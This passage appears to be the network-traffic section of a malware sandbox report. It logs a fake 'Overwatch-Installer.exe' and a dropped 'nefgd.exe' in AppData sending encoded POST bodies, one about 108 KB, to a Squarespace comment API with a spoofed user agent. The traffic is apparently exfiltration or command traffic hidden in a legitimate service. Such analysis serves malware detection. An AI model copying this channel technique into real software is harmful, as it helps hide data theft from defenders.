Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:58 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:58 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BULkVyHQnef_NzEwZGFkZDcwYzg4N2NmMzk3YTczY2Q1NTNjYzA0; Path=/; Secure Set-Cookie: crumb=BZPkduDIZYAVN2EzZThjYmY3NjY2MmNlM2FkMDU4NmY2ZDcyMjlj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: WLakeAl2/ZkTGXITI Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZPkduDIZYAVN2EzZThjYmY3NjY2MmNlM2FkMDU4NmY2ZDcyMjlj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	49848	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:58 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:58 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:58 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:59 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:58 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BUxtK9fbCXpVZmMzNTQxOGE3NzNiNDU1ZTYyYmZmODA5ZGQ1NTAy; Path=/; Secure Set-Cookie: crumb=BZX7Pnzh4UTkOTM0MmJiYmZhYTdhZDE4ZmVkZGUxMjMxMTMzY2Jk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: jhB4gHbK/EnVOjIAU Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZX7Pnzh4UTkOTM0MmJiYmZhYTdhZDE4ZmVkZGUxMjMxMTMzY2Jk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	49849	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:59 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:59 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:59 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 51 79 74 4b 47 4d 67 41 35 76 36 67 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmQytKGMgA5v6ggVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:59 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:59 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:59 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:59 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:59 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:59 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:59 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:59 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:59 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:59 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZ20tKCSpN85MGRiNjM1YzkyZjhmOTRmMzM2NWY4MzM4NDlkNmIz; Path=/; Secure Set-Cookie: crumb=BcbdR-WP42RiYmI0ODhhMzQxNjNhZTlmZGZlZTcxNGVhZDlhMjRj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: ohh07xi7/vK596KXn Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BcbdR-WP42RiYmI0ODhhMzQxNjNhZTlmZGZlZTcxNGVhZDlhMjRj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	49850	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:59 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:59 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:59 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:59 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:59 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQrgPNUj5WGGNTljZDY1ZDg4NDMxOTFjZjRlZTRhODVhNjBhZDMw; Path=/; Secure Set-Cookie: crumb=Bdjjh-qvWqtVZGU3YTlmYTA3MGRmMGY0ODUxYzY3YzU4MjMyYWE4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: ubpAzrQW/N4yc131b Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bdjjh-qvWqtVZGU3YTlmYTA3MGRmMGY0ODUxYzY3YzU4MjMyYWE4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	49851	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:59 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:59 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:59 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:59 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:59 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BY6EB6pHtFubZWQxYzY0OTBmYzJlOTk0ZjY3NjZhOTkwMTFmMjQx; Path=/; Secure Set-Cookie: crumb=BUW-2RIb4oC6MmU1MWZlNmQ0YWU0ZDMwYmNkNzE5MTE5OTU1MDdj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: dojm8CjH/HuGWBpGF Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUW-2RIb4oC6MmU1MWZlNmQ0YWU0ZDMwYmNkNzE5MTE5OTU1MDdj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	49852	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:59 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 332 Expect: 100-continue
2024-09-01 20:04:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:59 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:59 UTC	331	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 62 71 45 25 32 42 49 44 4a 53 66 53 47 54 71 68 72 34 35 76 78 59 73 71 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2bqE%2BIDJSfSGTqhr45vxYsqif6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BP
2024-09-01 20:04:59 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:59 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRNvTG692USkZjY0YTE3ZTgzNjYyYWU3ODU5ODM5ZGRlOWE0YTYy; Path=/; Secure Set-Cookie: crumb=BT_pEy0Uh3iPNmZhMjM0MDAzODg4M2RmMTUyM2U5MzEyMjE5Mjg3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: sLNWifeW/LZE6iqzm Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BT_pEy0Uh3iPNmZhMjM0MDAzODg4M2RmMTUyM2U5MzEyMjE5Mjg3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	49854	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:00 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:00 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:00 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:00 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:00 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVgTekYd4FhbYmI1OGRmNDIxYTJlMzViN2Q1MzdiZTc2ZGE1OThj; Path=/; Secure Set-Cookie: crumb=BRpC89iWZ-D4NDgwMTFmOWE0MjcxNjA3OTRmYjFmMzA3YzU2NmIz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: DBMbJcSx/vgeusk4f Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRpC89iWZ-D4NDgwMTFmOWE0MjcxNjA3OTRmYjFmMzA3YzU2NmIz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	49853	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:00 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:05:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:00 UTC	1	OUT	Data Raw: 70 Data Ascii: p
